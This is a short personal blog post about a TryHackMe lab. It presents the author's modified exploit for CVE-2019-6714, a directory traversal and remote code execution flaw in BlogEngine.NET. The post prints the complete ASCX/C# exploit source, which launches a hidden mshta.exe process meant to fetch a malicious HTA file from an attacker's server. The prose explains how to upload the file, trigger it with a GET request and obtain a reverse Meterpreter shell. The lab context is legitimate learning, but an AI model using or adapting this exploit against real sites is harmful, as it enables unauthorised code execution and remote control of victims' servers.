Hey y’all. This will be a quick post discussing my experience in exploit development where I modify the exploit for the CVE-2019-6714 vulnerability; specifically the exploit devevloped by Cobb (2019), which exploits a directory traversal vulnerability in the BlogEngine[.]NET content management system.
This was done for a TryHackMe boot2root machine — which I documented in the InfoSec Write-ups journal (see “Aleksey” 2022a; if the paywall is giving you problems, you can view it by opening your browser in private mode ).
I discuss the specifics on how to exploit this vulnerability in my writeup, but TL;DR — it works by uploading a C# script onto a BlogEngine[.]NET powered website that is vulnerable to CVE-2019-6714 and then triggering the exploit to execute via a GET request to said C# script.
I posted my modified version of Cobb’s exploit onto one of my GitHub repos. The source code, minus the comments, of my modified exploit is:
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
System.Diagnostics.Process payload = new System.Diagnostics.Process();
payload.StartInfo.FileName = "mshta.exe";
payload.StartInfo.Arguments = "";
payload.StartInfo.UseShellExecute = true;
payload.StartInfo.CreateNoWindow = true;
payload.Start();
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
Cobb’s original exploit uses C# network sockets libraries to make a reverse shell onto the attacker’s machine. The TryHackMe room had me “upgrade” my shell to the Meterpreter shell, but I decided to bypass that by modify Cobb’s exploit to execute code via mshta.exe
, then generate a Meterpreter payload that executes via an HTA server, then upload this script to the BlogEngine[.]NET website, trigger it and finally get a reverse Meterpreter shell. The line payload.StartInfo.Arguments = "";
should contain the URL to the malicious HTA file to execute a payload (note that the HTA server could be any payload, not necessarily a reverse Meterpreter shell).
Conclusion
This isn’t really a remarkable discovery — just “building off” the discovery of someone smarter than myself and trying to make my life easier. Plus, I’m trying to be a hacker — and what made me want to do go on with modifying Cobb’s exploit is that I didn’t want to follow the room’s instructions exactly as laid out. I gotta deviate from it in some way
Of course, I welcome any feedback or criticisms regarding my work
References
-
“Aleksey” (2022a). TryHackMe writeup: HackPark. InfoSec Write-ups. Retrieved on Dec. 31, 2022 from: https://infosecwriteups.com/tryhackme-writeup-hackpark-bd9c075c5262
-
“Aleksey” (2022b). Infosec/CVE-2019-6714.cs GitHub Repository. Retrieved on Dec. 31, 2022 from: https://github.com/Alekseyyy/InfoSec/blob/master/exploits/CVE-2019-6714.cs
-
BlogEngine.NET (n.d.). BlogEngine.NET | Free blogging platform. Retrieved on May 7, 2022 from: https://blogengine.io/
-
Cobb, D. (2019). BlogEngine.NET <= 3.3.6 Directory Traversal RCE. Exploit Database. Retrieved on Dec. 31, 2022 from: BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution - ASPX webapps Exploit
-
TryHackMe (n.d.). Retrieved on Dec. 31, 2022 from: https://tryhackme.com/
-
TryHackMe (n.d.-b). HackPark. TryHackMe. Retrieved from Dec. 31, 2022 from: https://tryhackme.com/room/hackpark